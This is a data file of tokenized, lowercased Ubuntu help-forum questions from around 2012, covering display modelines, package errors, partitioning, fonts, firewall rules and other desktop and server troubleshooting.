210520	ca n't get the right resolution for external monitor	this problem is probably pretty specific to my hardware , but i 'm getting frustrated with my limited knowledge on things i might try to solve it , so i post it anyway and hope for help : ) i 've got a new samsung series 9 notebook ( intel hd4000 graphic chip ) , and am running a pretty fresh ubuntu 12.10 ( dual boot with windows 7 ) on it . most things work fine except for my external monitor ( samsung syncmaster ) . it is connected to my notebook via an hdmi-d to vga adapter ( stupid combination , i know , but it 's the only one i could find hardware for ) . in /var/log/xorg.0.log , i find for it probed modes with resolutions between 640x480 and 1280x1024 , but not the one i want to use , which is 1920x1200 . 1024x768 seems to be the only resolution in the edid . i used cvt to get the modeline for 1920x1200 . output : # 1920x1200 59.88 hz ( cvt 2.30ma ) hsync : 74.56 khz ; pclk : 193.25 mhz modeline `` 1920x1200_60.00 '' 193.25 1920 2056 2256 2592 1200 1203 1209 1245 -hsync +vsync if i feed xrandr with these values , my monitor changes to some resolution which does n't even fill the full screen , and is skewed and flickering ( even after using the screens auto-adjust ) . ( the maximum dot clock frequency of my screen is 175 mhz , according to /var/log/xorg.0.log ) . i booted into windows to get a better modeline from there , but it also did n't support other resolutions than the ones between 640x480 and 1280x1024 . i connected my screen to my old laptop where it used to be working ( nvidia graphic card , no adapter nedded , vga to vga ) and got modelines there with cvt ( same output as above ) , and under windows -- output : '' 1920x1200 '' 153,900 1920 1968 2000 2080 1200 1203 1209 1235 +hsync -vsync this modeline works better than the cvt one , and after some auto-adjustement of the monitor one can almost manage to fit it to the actual size of the screen , but the display is very blurry ( barely sharp enough to read text ) . using modeline generators from the web with the data from my monitor gives things like modeline `` 1920x1200 @ 60i '' 87.66 1920 1952 2280 2312 1200 1227 1233 1261 interlace which do n't even lead to output . has anybody experienced similar problems , or has an idea what to do ? i really need an external screen for my work , and would greatly appreciate any hints ...
210522	which is the best place to get live wallpapers for compiz ?	i checked on askubuntu for links to sites offering live wallpapers but got none . gnome-art does n't seem to have any ( or for that matter i have n't been able to locate them ) . where will i get good free live wallpapers for ubuntu 12.04 64-bit ?
210527	start up on ubuntu 12.10 is much slower than on 12.04	start up toward login screen lasts about 40sec on both ( 12.10 and 12.04 ) . this is good for me . but after login , there is quite difference . system will start up in : ubuntu 12.04 : 10-13sec ubuntu 12.10 : at least 30sec i have chromium in start up applications and this is the only non default app there . i also disabled some unneeded apps such as bluetooth manager , ... i also have installed preload . is there problem on my side or is the new ubuntu slower in this way ? my pcs info : intelâž pentium ( r ) cpu g840 @ 2.80ghz ă 2 geforce gts 450/pcie/sse2 memory 3.9 gib ubuntu 12.10 32-bit
210528	combine two partitions belonging to one phsyical drive ?	when i first setup my ubuntu server , i had 1 x 3tb drive . since i could n't partition/format it into a 3tb ext4 , i partitioned it into 2 x 1.5tb ext4 . partition1 = 1.5tb partition2 = 1.5tb now i read that i could have changed from mbr to gpt but too late now , i already have data on partition1 . my question now is , what 's the best way to combine it without having to repartition and reformat ? will i be able to use lvm to combine them into 1 big volume ?
210530	casper set hostname via dhcp	i 'm booting sucessfull via pxeboot a live ubuntu remix . i wa n't to set the hostname via dhcp because i 'm booting several instances of the same image . right now i 'm using a hookline in /etc/dhcp/dhclient-enter-hooks.d/pinhostname that works quite well . run= '' yes '' if [ `` $ run '' = `` yes '' ] ; then var=`/sbin/ifconfig eth0 | /usr/bin/awk '/inet addr/ { print $ 2 } ' | /usr/bin/cut -f2 -d : ` var=`/usr/bin/dig -x $ var +short` var=`echo $ var | /usr/bin/awk -f. ' { print $ 1 } '` /bin/hostname $ var fi but the dhcp server comes to late for munin etc and the hostname is not set in time . in the casper log it shows me it receives the hostname much earlier : ip-config : eth0 hardware address 08:00:27:86:3e:84 mtu 1500 dhcp rarp ip-config : eth0 complete ( from 10.1.1.1 ) : address : 10.1.1.10 broadcast : 10.1.1.255 netmask : 255.255.255.0 gateway : 10.1.1.1 dns0 : 10.1.1.1 dns1 : 0.0.0.0 host : storage1 domain : domain.com rootserver : 10.1.1.1 rootpath : filename : pxelinux.0 how can i set that host name . i think i need to put a script in /scripts before i pack the initrd . there a loads of different scripts where would i put mine ? thank you for your time
210532	which ubuntu 12.10 on mac	i 'm about to install ubuntu 12.10 on my mac but i 'm not sure which .iso i should download . i have a macbook pro intel core i5 64 bit . what of the following will suit best on my system ? pc ( intel x86 ) desktop image 64-bit mac ( amd64 ) desktop image i 'm not sure because i hve a 64 bit mac as the second tells but it is an x86 too . i have also windows 7 installed and i 'd like a triple boot . thanks for your help
210540	need to write a script that will jailkit a user and give them access to a particular website directory	i have a ubuntu 12.04 app server hosting a few websites . we need to give access to the developer to only be able upload files to one of the websites . i have installed jailkit but ca n't seem to find how to give him sftp access to the website directory . here is our web directory structure : /var/www/website.com/htdocs/ /var/www/someotherwebsite.com/htdocs/ /var/www/website3.com/htdocs/ all owned by www-data : www-data can someone give me some step by steps to giving a user access to only one or two of these directories via sftp and no ssh access ?
210541	ufw configuration nat ppp0	please some tips how i can allow this request in ufw : [ ufw block ] in=ppp0 out=eth0 mac= src=10.11.22.2 dst=8.8.4.4 len=71 tos=0x00 prec=0x00 ttl=127 id=52 proto=udp spt=59405 dpt=53 len=51 i tried this but not helps : to action from -- -- -- -- -- -- anywhere allow 10.11.22.2 thanks for any tips .
210543	is there a supported mac theme available ?	the default themes in ubuntu like ambiance , radiance are good but old . so i want a mac theme for my ubuntu 12.10 . i tried some mac themes but they were either not full supported or not good . some part of the themes are not working properly and the icon theme is almost perfect but there is no * icon in the top-right corner . anybody have any suggestions ?
210550	ubuntu 12 installation	i booted ubuntu from a flash drive and then installed it from there . after the installation was complete and i restarted , but i never get prompted to use ubuntu . i even pressed f8 to get to the screen to select an os and ubuntu is not listed . my laptop now insists on doing a disc check each time i start it up which is highly frustrating . in windows 7 i can see that the amount i allocated to ubuntu has been subtracted from its partition size .
210551	make ubuntu run like a new installation again without reinstalling ?	i want to remove all the apps i have manually installed & erase all the configurations i have made . just like in case i want to give my computer to somebody else.. how can i do it while preserving personal files in home ?
210554	lost window borders in firefox while loading a local html file	firefox 16 , ubuntu 12.04 , gnome classic session , compiz effects enabled . is this a bug ? anybody else having this ? what shall i do ?
210560	ubuntu 12.10 ca n't shut down properly	i 'm using ubuntu 12.10 and after upgrading from 12.04 i 'm no longer able to shut down my pc . the system get stuck trying to shut down and i can see the text '' acpid : exiting '' what can i do ?
210562	apt autoremove fails after upgrading to 12.10	after upgrading to 12.10 , apt commands are failing . i think emacsen-common is causing the problem . how to i proceed ? user @ ubuntu : [ ~ ] $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : emacsen-common the following packages will be removed compiz-plugins-main g++-4.6 gcc-4.6-base : i386 gcj-4.6-base gcj-4.6-jre-lib gir1.2-folks-0.6 gir1.2-gee-1.0 jockey-common libbabl-0.0-0 libcelt0-0 libcommons-el-java libelf1 : i386 libgcj12 libgegl-0.0-0 libgomp1 : i386 libgsoap1 libjasper-java libjetty-java libllvm3.0 : i386 libservlet2.4-java libslf4j-java libstdc++6-4.6-dev libtiff4 : i386 libx264-120 libxfce4util4 nvidia-common packagekit-backend-aptcc python-central python-gmenu syslinux-themes-debian-squeeze the following packages will be upgraded : emacsen-common 1 upgraded , 0 newly installed , 30 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/17.3 kb of archives . after this operation , 125 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 482449 files and directories currently installed . ) preparing to replace emacsen-common 1.4.22ubuntu1 ( using ... /emacsen-common_2.0.3_all.deb ) ... /var/lib/dpkg/info/emacsen-common.prerm : 10 : /var/lib/dpkg/info/emacsen-common.prerm : /usr/lib/emacsen-common/emacs-package-remove : not found dpkg : warning : subprocess old pre-removal script returned error exit status 127 dpkg : trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 5 : /var/lib/dpkg/tmp.ci/prerm : /usr/lib/emacsen-common/emacs-package-remove : not found dpkg : error processing /var/cache/apt/archives/emacsen-common_2.0.3_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 127 /var/lib/dpkg/info/emacsen-common.postinst : 40 : /var/lib/dpkg/info/emacsen-common.postinst : /usr/lib/emacsen-common/emacs-package-install : not found dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : /var/cache/apt/archives/emacsen-common_2.0.3_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
210566	ca n't run ubuntu after the reboot	i followed the installation instructions . after the step of the reboot , when i try run ubuntu , i get the message that the file is missing or corrupted .
210567	vim disables ibus ime -- is this a bug ?	i 'm using ibus ime to input japanese text into gvim . i have the following vim script that i source when gvim starts up : autocmd insertleave * : call bug # oninsertleave ( ) function ! bug # oninsertleave ( ) python < < eot import vim import ibus bus = ibus.bus ( ) ic = ibus.inputcontext ( bus , bus.current_input_contxt ( ) ) ic.disable ( ) print `` bug # oninsertleave ( ) : exiting '' eot endfunction the line that constructs the inputcontext raises the exception : dbus.exception.dbusexception : org.freedesktop.dbus.error.failed : no focused input context this happens under the following conditions : i enter insert mode i insert some japanese text i exit insert mode if i do n't enter any japanese text through the ime , then the exception is not raised . i 've also noticed that if i exit insert mode after entering some japanese text while the ime is still enabled , then ime input is disabled ( i can see the icon change in the taskbar ) . if i exit insert mode without entering any japanese text , but while the ime is still enabled , then the ime stays enabled ( the icon does not change ) . it seems like gvim is disabling the ime ( or the ime is switching off ) in some conditions . could it be related to the exception ? edit i 've noticed that this does not happen with the command-line vim , only gvim . the ime is still disabled , but the above exception is not thrown . my questions are : is this a bug ? if it is , then whose bug is it ? vim , ibus , or something else ? are there any ways to work around the exception ? edit my system info : > misha @ misha-lmd : ~/git/iwait2013/lagos $ apt-cache policy ibus ibus : > installed : 1.4.1-3ubuntu1 candidate : 1.4.1-3ubuntu1 version table : > *** 1.4.1-3ubuntu1 0 > 500 http : //jp.archive.ubuntu.com/ubuntu/ precise/main amd64 packages > 100 /var/lib/dpkg/status misha @ misha-lmd : ~/git/iwait2013/lagos $ apt-cache policy vim vim : > installed : 2:7.3.429-2ubuntu2.1 candidate : 2:7.3.429-2ubuntu2.1 > version table : *** 2:7.3.429-2ubuntu2.1 0 > 500 http : //jp.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages > 100 /var/lib/dpkg/status > 2:7.3.429-2ubuntu2 0 > 500 http : //jp.archive.ubuntu.com/ubuntu/ precise/main amd64 packages ubuntu 12.04 , fluxbox . edit confirmed behaviour on unity as well .
210569	how to remove items from the nautilus context menu ?	it used to be possible to edit /usr/share/nautilus/ui/nautilus-directory-view-ui.xml in order to do that , but there is no such file in ubuntu 12.10 . how to remove from the nautilus context menu the following items ? copy to move to tags
210572	ca n't ping external websites	i ca n't ping google.com with my virtual ubuntu 12.04 server . i have set up a proxy url in my /etc/apt/apt.conf file and it says aquire : :http : :proxy http : //urlname.com:9999 ; now , i do n't know a lot about how the proxy works , but i do know when we use it on windows vmachines it 's a pac script that we place in internet explorer lan settings and it automatically detects the script and gives internet access . i tried including the 9999/proxy.pac in the apt.conf url and it did n't seem to work any better . would ubuntu know how to handle a proxy.pac assuming it was created for windows ? should my url include the .pac or just end after the port numbers ? i 've tried both without sucess , but i would like to know . a quick test to ping a fellow co-workers ' pc was sucessful . so i can see network computers , but not google . or other internet sources .
210576	how to enable usb in parallels workstation in ubuntu 12.04 ?	is there a way to enable usb feature inside parallels workstation in ubuntu 12.04 ? i did tried myself by somehow it didnt work : s plz help regards : )
210577	sip phones unreliable past 12.04 - empathy additional features ?	i am currently running empathy sip , which works `` ok '' but it 's definitely not up to the same standard that qutecom is on windows . qutecom on ubuntu is unstable , but yet still in the stable repository . i 've tried others with absolutely no stable results . can anyone provide a stable softphone with business grade features ( i.e . transfer , conference ) or point me in the right direction to ask for the features in a future build of empathy ? or even better , a fix for this sip audio nightmare ?
210579	can not upgrade to ubuntu 12.10	i tried to upgrade my ubuntu to 12.10 . but the update manager is not giving me any kind of button like `` upgrade '' . is this due to problems with my update manager ? should i reinstall ubuntu ?
210583	how to upgrade ubuntu and gnome without breaking existing settings ?	i have been using ubuntu 12.04 lts for about 5-6 months , and have everything configured as per my liking . i use gnome classic as the de instead of unity , and am comfortable with it . there are couple of extensions like having a 'show desktop ' icon , windows like icon in the panel for applications that are open , weather indicator and lots of extensions like that . lately i have been thinking about upgrading to 12.10 version . i am concerned about the below : if i do an upgrade to 12.10 from 12.04 ( instead of a clean install ) , will it affect any of the data that i have in my ubuntu drive ? will doing an upgrade remove my gnome de ? if gnome de would still be present , would i have to setup the extensions and other personalisations again , or would those be preserved ? i want to upgrade to 12.10 and use gnome 3.6 at the same time , without breaking any of the stuff i have configured in my current ubuntu 12.04 with gnome 3.4. let me know if this is possible .
210584	lucid install on dell r320	i 'm looking for some specific help installing lucid-64 on a dell r320 server . having never touched a dell server i am a lot lost here . goal is to install company proprietary software on the server . a server was chosen for hardness , not because it is a server , per se . previous test all done on a desktop and worked great . first questions are bios config related : 1 . do i install with raid enabled ? how do i select the raid type ? i have 2 pairs of drives , 500gb and 1tb . i want th eos on the 500 gb pair . 2 . do i want logical processors ? 3 . any other bios changes that 'd make things better . the ubuntu install cd gets as far as partioning the drives and shows no drives and no install partitions . i 'm guessing i 'm missing a driver . looking at the del site is a tad confusing as there are perhaps a dozen or more hdd drivers available , some for sata some for sas . the drives say sata so i guess that 's what i need . 1 . any recommendations on choice of driver ? 2 . how do i tell the install cd to find the driver ? even if it is on a usb key , how does the install see it ? i 'm sure to have more questions . but thanks for now .
210585	how do i install these libraries/codecs for matlab ?	i just installed matlab on my computer , seemingly successfully , but i 've been trying to run a program , and i 'm getting the following error : > > reproduceresults warning : directory already exists . > in reproduceresults at 14 processing ./data/baby.mp4 error using videoreader/init ( line 429 ) the file requires the following codec ( s ) to be installed on your system : video/x-h264 error in videoreader ( line 132 ) obj.init ( filename ) ; error in amplify_spatial_lpyr_temporal_iir ( line 31 ) vid = videoreader ( vidfile ) ; error in reproduceresults ( line 20 ) amplify_spatial_lpyr_temporal_iir ( infile , resultsdir , 10 , 16 , 0.4 , 0.05 , 0.1 ) ; > > for reference , the code that i 'm trying to run is here : http : //people.csail.mit.edu/mrub/vidmag/ # code i 'm running reproduceresults.m , after downloading all of the video files that they provided . any help would be appreciated ! i ca n't find any answers on google that work . the one that i 've tried is this : http : //memyselfandcomputer.blogspot.com/2011/01/matlab-2010-videox-h264-error-on-ubuntu.html it does n't seem to change anything though . is there a way to get a more verbose output to help me debug/search better ?
210590	can i override fonts installed by ttf-mscorefonts-installer , prefer liberation fonts ?	i had to apt-get install ttf-mscorefonts-installer on ubuntu 12.04/12.10 . the short version is i need to pipe pdf files out of an application that requires these fonts for certain glyphs . the problem , after running this command , is that the fonts in my web browser ( and some java apps ) are now `` ugly . '' obviously this is a subjective opinion but it is the one i hold . i want the old fonts back for most cases ( liberation , dejavu , ubuntu , ... ) . i 'm not sure how best to describe this but here 's an example : example css in webbrowser font-family : verdana , arial , sans-serif ; without ttf-mscorefonts-installer ( case 1 ) : $ fc-match verdana liberationsans-regular.ttf : `` liberation sans '' `` regular '' $ fc-match arial liberationsans-regular.ttf : `` liberation sans '' `` regular '' $ fc-match sans-serif liberationsans-regular.ttf : `` liberation sans '' `` regular '' ` with ttf-mscorefonts-installer ( case 2 ) : $ fc-match verdana verdana.ttf : `` verdana '' `` normal '' $ fc-match arial arial.ttf : `` arial '' `` normal '' $ fc-match sans-serif liberationsans-regular.ttf : `` liberation sans '' `` regular '' ` i want ( case 1 ) . optionally , i want the fonts in ( case 2 ) not to look `` ugly '' ie . they are more jagged , less smooth than their free alternatives in my web browsers . is this possible ?
210591	ca n't install acroread - 'dpkg returned an error code ( 1 ) '	after running sudo apt-get install acroread , i got the following output reading package lists ... done building dependency tree reading state information ... done suggested packages : libldap2 libgnome-speech7 the following new packages will be installed : acroread 0 upgraded , 1 newly installed , 0 to remove and 6 not upgraded . 1 not fully installed or removed . need to get 0 b/60.1 mb of archives . after this operation , 142 mb of additional disk space will be used . ( reading database ... 237901 files and directories currently installed . ) unpacking acroread ( from ... /acroread_9.5.1-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/acroread_9.5.1-1precise1_i386.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./opt/adobe/reader9/browser/intellinux/nppdf.so ' : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... /usr/bin/mandb : ca n't write to /var/cache/man/1645 : no space left on device errors were encountered while processing : /var/cache/apt/archives/acroread_9.5.1-1precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
210592	how to rollback 'xorg1.13 ' to 'xorg1.12 ' in 12.10 ?	my sound drivers are not recognized by ubuntu 12.10 and my web search tells me that the upgrade to xorg1.13 is the problem , but i do n't know how to roll back the driver ( or reinstall ) xorg1.12 . can someone provide me with some instructions on how to accomplish this ?
210593	wine `` runtime error 91 '' in 12.04	has anyone tried to load the ballistics program `` load from a disk '' into ubuntu 12.04 with wine ? i have it installed but on startup ( very first screen ) i get the message : runtime error '91 ' : object variable or with block variable not set . and the program does n't load . i am a total newbie with this os . previous ms user , so if anyone has a solution , try to make it as simple as possible . regardless , i 'll appreciate any and all help available .
210596	vlc depends on vlc-nox	i am trying to install vlc on 12.04 , but i 'm running into these errors : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.3-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libtar0 but it is not installable depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.3-0ubuntu0.12.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.3-0ubuntu0.12.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i fix these errors and install vlc ?
210598	how to install zlib libgcrypt using apt-get ?	when i do dpkg -i i see zlibc and libgcrypt11 in the installed applications ' list . but when i compile a c program having < zlib.c > or < gcrypt.c > it gives this error : no such file or directory are they really installed ? or they need to be added in gcc 's path ? if so what is the path of there header files ?
210602	hp proliant dl585 g2 installation , any problems ?	has anyone successfully installed server 12.04 on this machine ?
210604	no graphic card or input devices recognized after 12.10 upgrade ( thus useless )	my even less non-savvy friend upgraded her system from 12.04 to 12.10 tonight . after the boot screen , we 're faced with these two screens : as the first screen might indicate there 's no mouse input working and the keyboard works for getting to the second screen but not further . the first boot we encountered this issue we hade mouse and keyboard working and thus we got to a weird mixture between console and desktop , but mouse and keyboard failed after that point . the computer is a hp g62-a33eo laptop with ati graphics . how can i get the system working again ? ( or if nothing else , save the data that is stored on the drive ? )
210607	terminal ca n't find img file of ubuntu 12.10	on a mac , i followed the steps for the 'usb download from mac ' , but on step 9 : execute sudo dd if=/path/to/downloaded.img of=/dev/diskn bs=1m ( replace /path/to/downloaded.img with the path where the image file is located ; for example , ./ubuntu.img or ./ubuntu.dmg ) . when i replace /path/to/downloaded.img with the ubuntu.img file ( i converted the iso file into a img.dmg file , then to a img file ) and press enter , the terminal just comes up with : ubuntu.img ; file or directory not found . any reasons why this might be happening ?
210614	how to control of battery charging/discharging limits ?	i 'm running hp 530 laptop and ubuntu 10.04 . my old battery is died some times ago , so i have got the new one . i 'd like to get possibility to change the limits when the charger starts to charge battery ( e.g . < 50 % ) and finished ( e.g . > 80 % ) . it should sufficiently extend the battery life . see how to prolong lithum-based batteries . i know that lenovo users are luckily provided with a solution because of the tp_smapi kernel module . is there a solution that helps ?
210615	how to have `ll` command not display hidden files	when i type ll or ls to list the contents of a directory ... the ls command shows un-hidden files and folders in a horizontal view . to show the hidden folders , i have to type ls -a. i like how this works . the ll command shows all files and folders , including hidden ones without needing to add -a. i would like ll to list only unhidden files and folders by default . and if i want to show the hidden ones , i 'd like to have to type ll -a . how can i set this up ?
210623	modify actions when battery is critically low ?	i am running ubuntu ( not xubuntu ) and am using xfce4 on my laptop . when my laptop battery is critically low , ubuntu/xfce4 performs some action ( perhaps hibernate ? ) which causes my laptop to shut down . however when i start it again , it never comes up . i do n't even get bios or anything on the screen , it is completely black . the only way to get it back up is to take it apart , remove the internal cmos battery as well as the main battery , wait a few minutes , and put it back together . obviously this is not optimal . how do i disable all actions when the battery is critically low ? i would rather have it run out of power , than ending up in this error condition .
210625	tab key does n't work	since a couple of days , my tab key does n't work . alt + tab works fine . for example in a text editor it does nothing , but for example in a form in the browser it blinks/focuses the field but it does n't jump to the next field of the form . it works fine in my dual-boot windows installation . any ideas as to what is causing this and how to fix it ?
210626	preventing applications from being closed on terminal exit	when i close a terminal it closes all programs opened from it . in other linux packages such as scientific linux using an ampersand prevents this , e.g. , emacs file.txt & however , this is not the case with ubuntu 10.04 . is there away to stop the applications like emacs being closed on exit of the terminal ? i have tried nohup but this dose n't work .
210627	unable to locate package libopenssl1.8	in response to this post http : //www.ruby-forum.com/topic/188432 , i am trying to install libopenssl1.8 , but i get an error : viggy @ ubuntu : ~/documents/github/core3 $ sudo apt-get install libopenssl1.8 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libopenssl1.8 e : could n't find any package by regex 'libopenssl1.8'
210631	desktop launcher for terminal apps	i have software to run opensim , it requires the terminal window to start , run and shut down . i have 3 instances of it running in 3 terminal windows , with mysql for the 3 databases . normally to start each instance i have to open 3 terminal windows , then in each i have to type out the path to the opensim.exe file . the commands are like this below but the directory name on the desktop differs for each as there are 3 seperate instances , example for one ; cd desktop/mexico/bin mono opensim.exe this is a little pain to type out each time , so i wanted to place 3 icons on the desktop i could just click start each , i thought i had it right with this below but there was an error when the terminal started , and now i remember i forgot to include the mono command but i 'm not sure how the syntax should go . this is what i tried , and i saved the file as opensim.desktop and saved it on the desktop ; [ desktop entry ] name=opensim comment=opensim launcher exec= /desktop/mexico/bin/opensim.exe icon=/desktop/mexico/icon.png terminal=true type=application categories=games ; startupnotify=true where did i go wrong in there and how should i adjust that to make this work ? i figure i 'll have to make 3 of these and just name them opensim1 2 and 3 and have the 3 icons .
210636	how i can apply the same effect to multiple pictures at the same time by gimp ?	if i have many pictures and want to do the same effect or the same change to all these pictures by gimp , is there is easier method to do this instead of applying the effect to the pictures picture by picture ?
210637	conky is crazy !	i have just installed conky on my ubuntu 12.04 lts but it appears ... in the terminal ( and only in it ) : $ conky uptime : 0h 3m 35s frequency ( in mhz ) : 800 frequency ( in ghz ) : 0.80 ram usage : 740mib/3.76gib - 19 % # # ________ swap usage : 0b/3.72gib - 0 % __________ cpu usage : 6 % # _________ processes : 146 running : 1 file systems : / 14.1gib/91.7gib # # ________ networking : up : 0b - down : 0b name pid cpu % mem % conky 2445 0.00 0.03 bash 2390 0.00 0.12 gnome-pty-helpe 2389 0.00 0.02 gnome-terminal 2383 0.00 0.52 i have tryed other conkyrc files to customize it but i get somethings like this : $ conky -c /home/ubu/scrivania/conky_grey/conkyrc_grey # conky , a system monitor , based on torsmo # # any original torsmo code is licensed under the bsd license # # all code written since the fork of torsmo is licensed under the gpl # # please see copying for details # # copyright ( c ) 2004 , hannu saransaari and lauri hakkarainen # copyright ( c ) 2005-2010 brenden matthews , philip kovacs , et . al . ( see authors ) # all rights reserved . # # this program is free software : you can redistribute it and/or modify # it under the terms of the gnu general public license as published by # the free software foundation , either version 3 of the license , or # ( at your option ) any later version . # # this program is distributed in the hope that it will be useful , # but without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the # gnu general public license for more details . # you should have received a copy of the gnu general public license # along with this program . if not , see < http : //www.gnu.org/licenses/ > . # background no cpu_avg_samples 2 net_avg_samples 2 no_buffers yes out_to_stderr no update_interval 1.0 uppercase no use_spacer none text $ { scroll 16 $ nodename - $ sysname $ kernel on $ machine | } uptime : $ uptime frequency ( in mhz ) : $ freq frequency ( in ghz ) : $ freq_g ram usage : $ mem/ $ memmax - $ memperc % $ { membar 4 } swap usage : $ swap/ $ swapmax - $ swapperc % $ { swapbar 4 } cpu usage : $ cpu % $ { cpubar 4 } processes : $ processes running : $ running_processes file systems : / $ { fs_used / } / $ { fs_size / } $ { fs_bar 6 / } networking : up : $ { upspeed eth0 } - down : $ { downspeed eth0 } name pid cpu % mem % $ { top name 1 } $ { top pid 1 } $ { top cpu 1 } $ { top mem 1 } $ { top name 2 } $ { top pid 2 } $ { top cpu 2 } $ { top mem 2 } $ { top name 3 } $ { top pid 3 } $ { top cpu 3 } $ { top mem 3 } $ { top name 4 } $ { top pid 4 } $ { top cpu 4 } $ { top mem 4 }
210639	opening a gtk.window that covers launcher and panel	i am trying to create a gtkwindow that would be on top of all the windows . this includes unity 's launcher and panel . i am working on kazam screen recorder and one of the options of the program is recording an arbitrary area of the screen . for this , i open a gtkwindow and let user resize it and move it around the screen to the desired location . the problem is when user wants to resize the window over the panel ( or launcher ) . it ca n't be done . it seems that window manager is preventing this . i can move the window under panel and launcher if i alt-drag it , but the problem because area selection window stays below launcher and panel . any ideas are more than welcome .
210642	how can i buy from software center from my mac computer ?	i want to purchase software for my ubuntu 12.04 ( through sofware center ) but now i ca n't use my ubuntu computer ( it 's not at home ) , i 'm only with my mac , and the software i want to buy has a reduced price just until november 3 ... how can i buy from ubuntu software center from my mac ? i have an account already .
210647	drivemount applet on cinnamon	i migrated to 12.04. under gnome / mate i have drivemount applet . it autodiscovers my encrypted lvm and show an icon . i can click on that icon , popup appears , i type password and my drive is mounted and ready for use . is there such thing in cinnamon ?
210657	box like icons in application list wo n't go away	picture on http : //tempquestionimageserver.weebly.com/ sorry , i put a picture on this post and it said new members could n't do that . these box like icons wo n't go away . they wo n't move to the trash . when you right click on an application it expands with info , on the box icons it expands but no information . when you click on an application it closes the app list and opens the app , with the box things it does n't close the app list and does n't open anything . as far as i can remember i do n't think i 've ever asked a question online about something that i could n't figure out . i always found the answer somewhere on the internet , but this time i just could n't find the answer . please help me figure out how to get these off my app list .
210667	f-spot : ca n't view my photos anymore after update to quantal	i upgraded to quantal a few days ago . after that i could not view my photos anymore in f-spot . i can only see the tags and the image data but not the images or their thumbs . the photo-db seems to be okay , it has been updated ( automatically ? ) to sqlite3 , and i can open the pictures with f-spot viewer , gimp , eog or any other program - but not in f-spot itself . i hope there is an answer to this .
210669	crashes when using gnome tweak tool with gnome 3.4.1	when i try to luch gnome-tweak-tool from terminal i get info : no translated schema for org.gnome.desktop.wm.preferences ( domain : gsettings-desktop-schemas ) error : could not find any typelib for gnomedesktop traceback ( most recent call last ) : file `` /usr/bin/gnome-tweak-tool '' , line 75 , in < module > mainwindow ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/mainwindow.py '' , line 41 , in __init__ model ) file `` /usr/lib/python2.7/dist-packages/gtweak/tweakview.py '' , line 58 , in __init__ self._model.load_tweaks ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/tweakmodel.py '' , line 146 , in load_tweaks mods = __import__ ( `` gtweak.tweaks '' , globals ( ) , locals ( ) , tweak_files , 0 ) file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_typing.py '' , line 22 , in < module > from gi.repository import pango , gtk , gnomedesktop importerror : can not import name gnomedesktop any suggestions ?
210670	quantal ( 12.10 ) gnome 3.7.1 : user shell extension not enabled	i just upgraded to ubuntu 12.10 from the previous version . i have gnome 3.7.1 ( according to synaptic packet manager ) and tweak tools . i ca n't get user shell theme extension enabled in tweak tools -- there 's an exclamation mark next to that switch . can somebody help me out ? i 've been to https : //extensions.gnome.org/ but the only user theme extension is given as `` outdated '' . i 've downloaded two themes from gnome-looks.org and placed them in ~/.themes . if i right-click anywhere , the menu that opens up , looks quite primitive . what can i do to fix the problem ? user shell extension not enabled gnome 3.7.1 right click menu looks strange
210672	terminal broken ? ( mac )	in terminal ( mac ) when i do step 9 ( sudo dd if=//users/neilatkin/desktop/ubuntu.img of=/dev/disk1 bs=1m ( replace /path/to/downloaded.img with the path where the image file is located ; for example , ./ubuntu.img or ./ubuntu.dmg ) ) , when i press enter then enter the password to the mac it just has white underneath it and after it does nothing when i enter in commands . to get it to work again i have to close it and re-open it . i 'm pretty sure that i 'm using the correct file from my desktop too .
210673	ubuntu 11.10 got virus or malware , how to delete entire disk and re install ?	had the ubuntu sitting idle , came back to find it had linked and connected to malware sites , do not know how . just want to delete/re install . want to stay with 11.10 the pc itself does not have a cd-rom drive , the question is how to wipe the disk , and then what about re installing ? from a usb stick ?
210680	installing times new roman font	how can i install the times new roman font ? this video illustrates what i want to do , but i do not have the same options - i 'm running ubuntu 12.10 . i have also tried running the following from the terminal : sudo apt-get install msttcorefonts sudo apt-get install ttf-mscorefonts-installer this is the message i receive : reading package lists ... done building dependency tree reading state information ... done ttf-mscorefonts-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . any suggestions ? -benjamin
210681	preseed create two empty partitions ( `` do not use '' ) with partman	i have a question about preseeding . i need to create a simple partition table like this : / 10 g ext3 primary swap 8 g swap primary 100g `` do not use '' primary ( to be later used for drbd ) 100g `` do not use '' primary ( to be later used for drbd ) the first two are no problem but i cant find the correct way to create two empty partitions of 100g which i can use for drbd . is there someone that can give me a hint ? thanks alot ! remco
